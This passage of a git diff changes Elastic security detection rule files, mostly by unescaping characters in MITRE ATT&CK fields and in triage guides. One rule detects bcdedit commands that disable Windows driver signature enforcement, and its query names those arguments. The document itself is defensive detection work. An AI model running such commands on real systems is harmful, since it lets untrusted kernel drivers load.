post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json index 9e84f8f3a93..0751681f966 100644 --- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json +++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_4.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Built-in tools", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n", "related_integrations": [ { @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json index dd1dd2fdea3..7066a1f5db1 100644 --- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json +++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Built-in tools", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json index 20905ccf7d9..1be4f94e3f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json index 3c9e76a0ae4..8c8c1caf15c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json index 78b251693df..eb598a38f35 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json index 220bb988603..d98e90fe28a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json index a78914d0f47..5cd2659c2b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json index aa8a38e4db4..7e3106c0e7a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json index 37c0a192fb4..787a6a6079b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json index b0bd516b24f..58a83259144 100644 --- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json +++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json index a7aedc3c3ff..3e7919d7d9b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json index 633c423c599..08683a5837c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json index 5ae2fc6406a..41d70c24370 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json index ae1bdc89409..202193c5eee 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json index 858f057e94a..1fc6ab4df91 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json index af9f190ce26..4be09e70ad2 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json index 6b08b59b6a7..36c984c40fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json +++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json index 165bf688637..c76d9bba132 100644 --- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json index a772db305f0..6edb60000fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json index b3da2cbea79..9372d84a1b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json +++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git 